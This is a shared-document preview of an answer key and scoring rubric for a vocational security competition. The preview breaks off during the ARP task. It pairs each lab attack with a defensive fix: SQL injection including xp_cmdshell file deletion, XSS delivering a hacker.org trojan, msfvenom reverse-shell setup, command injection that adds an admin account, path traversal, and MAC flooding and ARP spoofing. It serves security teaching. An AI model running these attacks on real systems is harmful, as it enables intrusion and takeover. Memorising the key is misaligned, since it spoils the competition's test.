高职组GZ024信息安全管理与评估赛项第二阶段答案及评分标准.docx

上传人:b****1 文档编号:2089892 上传时间:2023-05-02 格式:DOCX 页数:38 大小:1.92MB
下载 相关 举报
高职组GZ024信息安全管理与评估赛项第二阶段答案及评分标准.docx_第1页
第1页 / 共38页
高职组GZ024信息安全管理与评估赛项第二阶段答案及评分标准.docx_第2页
第2页 / 共38页
高职组GZ024信息安全管理与评估赛项第二阶段答案及评分标准.docx_第3页
第3页 / 共38页
高职组GZ024信息安全管理与评估赛项第二阶段答案及评分标准.docx_第4页
第4页 / 共38页
高职组GZ024信息安全管理与评估赛项第二阶段答案及评分标准.docx_第5页
第5页 / 共38页
高职组GZ024信息安全管理与评估赛项第二阶段答案及评分标准.docx_第6页
第6页 / 共38页
高职组GZ024信息安全管理与评估赛项第二阶段答案及评分标准.docx_第7页
第7页 / 共38页
高职组GZ024信息安全管理与评估赛项第二阶段答案及评分标准.docx_第8页
第8页 / 共38页
高职组GZ024信息安全管理与评估赛项第二阶段答案及评分标准.docx_第9页
第9页 / 共38页
高职组GZ024信息安全管理与评估赛项第二阶段答案及评分标准.docx_第10页
第10页 / 共38页
高职组GZ024信息安全管理与评估赛项第二阶段答案及评分标准.docx_第11页
第11页 / 共38页
高职组GZ024信息安全管理与评估赛项第二阶段答案及评分标准.docx_第12页
第12页 / 共38页
高职组GZ024信息安全管理与评估赛项第二阶段答案及评分标准.docx_第13页
第13页 / 共38页
高职组GZ024信息安全管理与评估赛项第二阶段答案及评分标准.docx_第14页
第14页 / 共38页
高职组GZ024信息安全管理与评估赛项第二阶段答案及评分标准.docx_第15页
第15页 / 共38页
高职组GZ024信息安全管理与评估赛项第二阶段答案及评分标准.docx_第16页
第16页 / 共38页
高职组GZ024信息安全管理与评估赛项第二阶段答案及评分标准.docx_第17页
第17页 / 共38页
高职组GZ024信息安全管理与评估赛项第二阶段答案及评分标准.docx_第18页
第18页 / 共38页
高职组GZ024信息安全管理与评估赛项第二阶段答案及评分标准.docx_第19页
第19页 / 共38页
高职组GZ024信息安全管理与评估赛项第二阶段答案及评分标准.docx_第20页
第20页 / 共38页
亲,该文档总共38页,到这儿已超出免费预览范围,如果喜欢就下载吧!
下载资源
资源描述

高职组GZ024信息安全管理与评估赛项第二阶段答案及评分标准.docx

《高职组GZ024信息安全管理与评估赛项第二阶段答案及评分标准.docx》由会员分享,可在线阅读,更多相关《高职组GZ024信息安全管理与评估赛项第二阶段答案及评分标准.docx(38页珍藏版)》请在冰点文库上搜索。

高职组GZ024信息安全管理与评估赛项第二阶段答案及评分标准.docx

高职组GZ024信息安全管理与评估赛项第二阶段答案及评分标准

任务1:

SQL注入攻防(55分)

1.Web访问DCST中的WebServ2003服务器,进入login.php页面,分析该页面源程序,找到提交的变量名,并截图;(5分)

找到源程序:

(2分)

页面标题:

LoginPage

找到提交的变量名(3分)

提供以下变量:

name="usernm"

name="passwd"

2.对该任务题目1页面注入点进行SQL注入渗透测试,使该Web站点可通过任意用户名登录,并将测试过程截图;(5分)

构造注入语句:

username:

任意用户名

password:

含:

orX=’X

(X为任意值)

(3分)

同时包含截图:

1、通过任意用户名登录(截图)

2、登录成功页面(截图)

(2分)

3.进入DCST中的WebServ2003服务器的C:

\AppServ\www目录,找到loginAuth.php程序,使用EditPlus工具分析并修改PHP源程序,使之可以抵御SQL注入,并将修改后的PHP源程序截图;(10分)

(10分)

包含语句:

1、

selectpasswordfromuserswhereusername=’$username’

2、

if($obj->password==$password)

4.再次对该任务题目1页面注入点进行渗透测试,验证此次利用该注入点对该DCST中的WebServ2003服务器进行SQL注入渗透测试无效,并将验证过程截图;(5分)

同时包含截图:

1、通过任意用户名登录(截图)

2、登陆后,页面出现用户名不存在提示;(截图)

(5分)

5.Web继续访问DCST中的WebServ2003服务器,"/"->"EmployeeInformationQuery",分析该页面源程序,找到提交的变量名,并截图;(5分)

找到源程序:

(2分)

找到的源程序含有页面标题:

Query

找到提交的变量名(3分)

name="usernm"

6.对该任务题目5页面注入点进行渗透测试,根据输入“%”以及“_”的返回结果确定是注入点,并将测试过程截图;(5分)

(2分)

输入“%”,返回所有用户信息(截图)

输入“_”,返回所有用户信息(截图)

(3分)

7.通过对该任务题目5页面注入点进行SQL注入渗透测试,删除DCST中的WebServ2003服务器的C:

\目录下的1.txt文档,并将注入代码及测试过程截图;(5分)

构造注入语句:

‘execmaster.dbo.xp_cmdshell‘delc:

\1.txt’--

(5分)

8.进入DCST中的WebServ2003服务器的C:

\AppServ\www目录,找到QueryCtrl.php程序,使用EditPlus工具分析并修改PHP源程序,使之可以抵御SQL注入渗透测试,并将修改后的PHP源程序截图;(10分)

截图:

在服务器场景QueryCtrl.php源程序语句:

$keyWord=$_REQUEST[‘usernm’]之后加入:

(10分)

9.再次对该任务题目5页面注入点进行渗透测试,验证此次利用注入点对该WebServer进行SQL注入渗透测试无效,并将验证过程截图。

(5分)

通过:

‘execmaster.dbo.xp_cmdshell‘delc:

\1.txt’—

再次进行SQL注入截图;

系统出现错误提示:

BadKeyWord!

(截图)

(5分)

任务2:

XSS和CSRF攻防(65分)

 

1.Web访问DCST中的WebServ2003服务器,"/"->"EmployeeMessageBoard",分析该页面源程序,找到提交的变量名,并截图;(5分)

找到源程序:

(2分)

含有页面标题:

MessageBoard

找到提交的变量名:

(3分)

name="MessageUsername"

name="message"

 

2.对该任务题目1页面注入点进行XSS渗透测试,并进入"/"->"EmployeeMessageBoard"->"DisplayMessage"页面,根据该页面的显示,确定是注入点,并将测试过程截图;(5分)

构造注入代码:

(2分)

测试注入成功:

(3分)

弹出alert("Hacker!

")括号中的消息;

3.对该任务题目1页面注入点进行渗透测试,使"/"->"EmployeeMessageBoard"->"DisplayMessage"页面的访问者执行网站(http:

//hacker.org/)中的木马程序:

http:

//hacker.org/TrojanHorse.exe,并将注入代码及测试过程截图;(5分)

构造注入代码:

(2分)

测试过程:

(3分)

名称:

trojanhorse.exe

发送者:

hacker.org

4.通过IIS搭建网站(http:

//hacker.org/),并通过Kali生成木马程序TrojanHorse.exe,将该程序复制到网站(http:

//hacker.org/)的WWW根目录下,并将搭建该网站结果截图;(5分)

搭建IIS(1分)

Internet信息服务:

网站目录下存放:

trojanhorse.exe

搭建DNS(1分)

正向查找区域:

主机(截图)

Zone:

Org

主机:

hacker

MetasploitFramework:

TrojanHorse.exe生成(3分)

root@bt:

~#Ifconfig

(截图)

显示KaliIP地址:

X.X.X.X

截图包含:

root@bt:

~#msfvenom–pwindows/meterpreter/reverse_tcpLHOST=X.X.X.XLPORT=80–fexe–otrojanhorse.exe

 

5.当"/"->"EmployeeMessageBoard"->"DisplayMessage"页面的访问者执行网站(http:

//hacker.org/)中的木马程序TrojanHorse.exe以后,访问者主机需要被Kali主机远程控制,打开访问者主机的CMD.exe命令行窗口,并将该操作过程截图;(5分)

MetasploitFramework:

HackerReverseTcp连接客户端(2分)

root@bt:

~#msfconsole

msf>useexploit/multi/handler

msfexploit(handler)>setPAYLOADwindows/meterpreter/reverse_tcp

PAYLOAD=>windows/meterpreter/reverse_tcp

msfexploit(handler)>setLHOSTX.X.X.X

LHOST=>X.X.X.X

msfexploit(handler)>setLPORT80

LPORT=>80

msfexploit(handler)>exploit

[*]StartedreversehandleronX.X.X.X:

80

[*]Startingthepayloadhandler...

(截图中包含黄色部分)

访问者主机需要被Kali主机远程控制(3分)

KaliMSF提示(截图)包含如下信息

KaliIP:

X.X.X.X

访问者主机IP:

Y.Y.Y.Y

[*]Sendingstage(……bytes)toY.Y.Y.Y

[*]Meterpretersession1opened(X.X.X.X:

Port1->Y.Y.Y.Y:

Port2)at……

meterpreter>

Kali截图包含打开访问者主机的CMD.exe命令行窗口;

6.进入DCST中的WebServ2003服务器的C:

\AppServ\www目录,找到insert.php程序,使用EditPlus工具分析并修改PHP源程序,使之可以抵御XSS渗透测试,并将修改后的PHP源程序截图;(10分)

(10分)

在服务器场景原insert.php程序语句$info=$_REQUEST[‘message’]后加入:

绿色部分,通过替换函数,通过其它字符({},(),[]等字符)替换字符“<”和“>”均可得分;

$info=str_replace(“<”,”(”,$info);

$info=str_replace(“>”,”)”,$info);

$info=str_replace(“<”,”{”,$info);

$info=str_replace(“>”,”}”,$info);

$info=str_replace(“<”,”[”,$info);

$info=str_replace(“>”,”]”,$info);

7.再次对该任务题目1页面注入点进行渗透测试,验证此次利用该注入点对该DCST中的WebServ2003服务器进行XSS渗透测试无效,并将验证过程截图;(5分)

SQLServer企业管理器中,Message表中info字段注入语句符号“<”和“>”被替换为上一题替换后的字符;同时CommunicationMessage页面显示Content:

注入语句符号“<”和“>”被替换为上一题替换后的字符;

(5分)

8.Web访问DCST中的WebServ2003服务器,"/"->"ShoppingHall",分析该页面源程序,找到提交的变量名,并截图;(5分)

找到源程序:

(2分)

页面标题为:

ShoppingHall

找到提交的变量名:

(3分)

goods=keyboard&quantity=1

goods=mouse&quantity=1

goods=monitor&quantity=1

goods=cpu&quantity=1

goods=memory&quantity=1

goods=dvdrom&quantity=1

9.对该任务题目1页面注入点进行渗透测试,使"/"->"EmployeeMessageBoard"->"DisplayMessage"页面的访问者向页面ShoppingProcess.php提交参数goods=cpu&quantity=999999,查看"/"->"PurchasedGoods.php页面,并将注入代码及测试过程截图;(5分)

构造注入代码:

(2分)

WebServerIP:

X.X.X.X

测试过程:

(3分)

截图:

Goods:

CPU----数值大于或等于999999

10.进入DCST中的WebServ2003服务器的C:

\AppServ\www目录,找到DisplayMessage.php程序,使用EditPlus工具分析并修改PHP源程序,使之可以抵御CSRF渗透测试,并将修改后的源程序截图;(10分)

截图:

服务器场景DisplayMessage.php程序语句:

echo“Content:

”.”$obj->info”.”……”

替换为:

echo“Content:

”.strip_tags(”$obj->info”).”……”

(10分)

11.再次对该任务题目1页面注入点进行渗透测试,验证此次利用该注入点对该DCST中的WebServ2003服务器进行CSRF渗透测试无效,并将验证过程截图;(5分)

(5分)

得分点:

直接显示代码信息,而不是将代码执行;

(截图)

SQLServer企业管理器中,Message表中info字段注入语句含有标记;同时CommunicationMessage页面显示Content:

注入语句不含有标记

任务3:

命令注入与文件包含攻防(50分)

 

1.Web访问DCST中的WebServ2003服务器,"/"->"DisplayDirectory",分析该页面源程序,找到提交的变量名,并截图;(5分)

找到源程序:

(2分)

页面标题:

DisplayC:</p><p>\’sDirectory

找到提交的变量名:

(3分)

name="directory"

 

2.对该任务题目1页面注入点进行渗透测试,使页面DisplayDirectoryCtrl.php回显C:

\Windows目录内容的同时,对WebServer添加账号“Hacker”,将该账号加入管理员组,并将注入代码及测试过程截图;(5分)

注入语句:

(2分)

WINDOWS|netuserHackerP@ssword/add

WINDOWS|netlocalgroupadministratorsHacker/add

测试成功:

(3分)

截图:

含有:

命令成功完成。

3.进入DCST中的WebServ2003服务器的C:

\AppServ\www目录,找到DisplayDirectoryCtrl.php程序,使用EditPlus工具分析并修改PHP源程序,使之可以抵御命令注入渗透测试,并将修改后的源程序截图;(10分)

(10分)

包含语句:

$str=’|’

if(strstr($directory,$str)==false)

4.再次对该任务题目1页面注入点进行渗透测试,验证此次利用注入点对该DCST中的WebServ2003服务器进行命令注入渗透测试无效,并将验证过程截图;(5分)

截图1:

利用注入点对该DCST中的WebServ2003服务器进行命令注入渗透测试;

含有本任务第2题的命令注入语句;

WINDOWS|netuserHackerP@ssword/add

WINDOWS|netlocalgroupadministratorsHacker/add

截图2:

页面出现非法输入提示;

含有本任务题目3修改后代码中的错误提示信息;

本案例提示信息为:

illegalinput!

(5分)

5.Web访问DCST中的WebServ2003服务器,"/"->"DisplayUploaded'sFileContent",分析该页面源程序,找到提交的变量名,并截图;(5分)

找到源程序:

(2分)

页面标题:

DisplayUpload’sFileContent

找到提交的变量名:

(3分)

name="filename"

6.对该任务题目5页面注入点进行渗透测试,使页面DisplayFileCtrl.php回显DCST中的WebServ2003服务器访问日志文件:

AppServ/Apache2.2/logs/access.log的内容,并将注入代码及测试过程截图;(5分)

构造注入代码:

(2分)

..\..\..\AppServ\Apache2.2\logs\access.log

回显DCST中的WebServ2003服务器访问日志文件:

显示出AppServ/Apache2.2/logs/access.log的内容:

(3分)

InternetExplorer地址栏中须含有:

DisplayFileCtrl.php?

filename=

 

7.进入DCST中的WebServ2003服务器的C:

\AppServ\www目录,找到DisplayFileCtrl.php程序,使用EditPlus工具分析并修改PHP源程序,使之可以抵御文件包含渗透测试,并将修改后的源程序截图;(10分)

(10分)

包含语句:

$str=’..’

if(strstr($directory,$str)==false)

8.再次对该任务题目5页面注入点进行渗透测试,验证此次利用注入点对该DCST中的WebServ2003服务器进行文件包含渗透测试无效,并将验证过程截图。

(5分)

截图1:

利用注入点对该DCST中的WebServ2003服务器进行命令注入渗透测试;

输入框含有本任务题目6的注入代码:

..\..\..\AppServ\Apache2.2\logs\access.log

截图2:

页面出现非法输入提示;

含有本任务题目7修改后代码中的错误提示信息;

本案例提示信息为:

illegalinput!

(5分)

 

任务4:

数据窃取防护:

二层攻防(45分)

 

1.将PC1、Kali所连接端口划入与WAF同一VLAN(VLAN10),并将PC1、Kali分配与DCST服务器相同网段IP地址,使PC1、Kali、DCST中的WebServ2003服务器能够在同一个网段(VLAN10)内相互Ping通。

(2分)

截图:

PC1、Kali、DCST同在VLAN10;(#showvlan)

VLAN10中包含的接口数>=3;

WebServerIP配置(与参数表中服务器场景的IP地址一致):

PC1IP地址配置(与参数表中PC1的IP地址一致):

PC3IP地址配置(与参数表中PC3的IP地址一致):

三个终端之间能够相互Ping通;

在同一个窗口ping通除了本机外的2个IP地址;

 

2.查看DCRS交换机VLAN10的MAC地址表容量信息,并将DCRS交换机配置相关参数、查看命令、查看结果截图。

(3分)

#showmac-address-tablecountvlan10

DCRS地址表空间中有可用的空间;

当前地址表记录数少于地址表容量;

Maxentires……

Total……:

16384

Currententires……

Total……:

该数值小于10

3.从Kali发起MACFlooding渗透测试,使DCRS交换机的MAC地址表溢出,使其在MAC地址表溢出的条件下,无法学习到PC1和DCST中的WebServ2003服务器的MAC地址表信息,查看DCRS交换机的MAC地址表信息,并将渗透测试过程截图。

(5分)

Kali#macof

(2分)

#showmac-address-tablecountvlan10

当前地址表记录数等于地址表容量;

Maxentires……

Total……:

16384

Currententires……

Total……:

该数值=16384

(3分)

4.Kali打开wireshark,验证在DCRS交换机MAC地址表溢出的条件下,可以监听到PC1访问DCST中的WebServ2003服务器的HTTP流量,并将该验证过程截图。

(5分)

PC1通过InternetExplorer访问;(截图)

地址栏包含:

服务器场景IP(匹配参数表服务器场景IP)/……

Kali打开wireshark,监听到PC1通过InternetExplorer访问DCST服务器场景的HTTP流量;

截图:

Source:

PC1的IP地址(与参数表一致)

Destination:

服务器场景的IP地址(与参数表一致)

Protocol:

HTTP

(5分)

5.在DCRS交换机Kali所连接端口配置PortSecurity特性,阻止Kali发起MACFlooding渗透测试,验证此时DCRS交换机MAC地址表能够学习到PC1、DCST中的WebServ2003服务器的MAC地址,并将DCRS交换机相关配置信息以及验证信息截图。

(8分)

配置截图包含:

mac-address-learningcpu-control

(2分)

在VLAN10每个接口全部启用如下:

InterfaceEthernet1/0/X

switchportport-security

(2分)

#clearmac-address-tabledynamic

(2分)

#showmac-address-tablecountvlan10

DCRS地址表空间中有可用的空间;

当前地址表记录数少于地址表容量;

Maxentires……

Total……:

16384

Currententires……

Total……:

该数值小于10

(2分)

6.在DCRS交换机配置PortSecurity特性的条件下,Kali再次打开wireshark,监听PC1访问DCST中的WebServ2003服务器流量,验证此时Kali无法监听到PC1访问DCST中的WebServ2003服务器的HTTP流量,并将验证过程截图。

(7分)

PC1通过InternetExplorer访问服务器场景;(截图)

地址栏包含:

服务器场景IP(匹配参数表服务器场景IP)/……

Kali打开wireshark,监听不到PC1通过InternetExplorer访问DCST的HTTP流量;(截图)

Filter:

http

显示报文数:

任务5:

数据窃取防护:

ARP攻防(45分)

 

1.在PC1访问DCST中的WebServ2003服务器时,查看PC1和DCST中的WebServ2003服务器的ARP缓存信息,并将PC1和DCST中的WebServ2003服务器的ARP缓存信息截图。

(5分)

PC1、WebServ2003

Ipconfig/all

分别显示PC1、WebServ2003的IP和MAC;

PC1的IP和MAC:

服务器场景的IP和MAC:

PC1通过InternetExplorer访问服务器场景;(截图)

地址栏包含:

服务器场景IP(匹配参数表服务器场景IP)/……

PC1:

ARP表项内容为

WebServ2003的IP->WebServ2003的真实的MAC;

WebServ2003:

ARP表项内容为

PC1的IP->PC1的真实的MAC;

2.在Kali对PC1进行ARPSpoofing渗透测试,使PC1无法访问DCST中的WebServ2003服务器,PC1的ARP缓存为:

DCST中的WebServ2003服务器IP->Kali的MAC地址,在PC1查看被Kali毒化后的ARP缓存信息,并将该信息截图。

(5分)

Kali:

#arpspoof–tPC1_IPWebServ2003_IP

(过程截图)

(2分)

PC1:

ARP表项内容为

WebServ2003的IP->Kali的MAC;

KaliMAC:

ifconfig

(截图)

(3分)

3.在Kali对PC1和DCST中的WebServ2003服务器进行ARP中间人渗透测试,使Kali能够使用w

展开阅读全文
相关资源
猜你喜欢
相关搜索
资源标签

当前位置:首页 > 人文社科 > 法律资料

copyright@ 2008-2023 冰点文库 网站版权所有

经营许可证编号:鄂ICP备19020893号-2